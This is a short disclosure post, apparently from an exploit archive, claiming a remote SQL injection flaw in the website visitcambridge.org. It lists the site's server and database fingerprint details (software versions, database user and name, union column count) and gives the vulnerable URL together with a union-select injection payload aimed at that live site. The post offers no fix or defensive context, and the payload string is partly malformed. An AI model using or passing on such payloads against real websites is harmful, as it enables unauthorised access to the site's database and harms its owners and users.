VisitCambridge.org suffers from a remote SQL injection vulnerability.
0c73d950be9f9c28faae7eb3ddd396bd70920416ff71315df6d4e418f4fbcd92
Host Information
Server = Apache/2.2.3 (CentOS)
Version = 5.0.22
Powered by = PHP/5.1.6
Current User = visitcambridge@localhost
Current Database = visitcambridge
Supports Union = yes
Union Columns = 3
Found By : Rohit Bansal [ rohitisback[at]gmail.com ]
Url| http://www.visitcambridge.org/unique.php?id=-1
Vuln: http://www.visitcambridge.org/unique.php?id=-1+and+1=0+ and 1=0 Union
Select UNHEX(HEX([visible])) ,2,3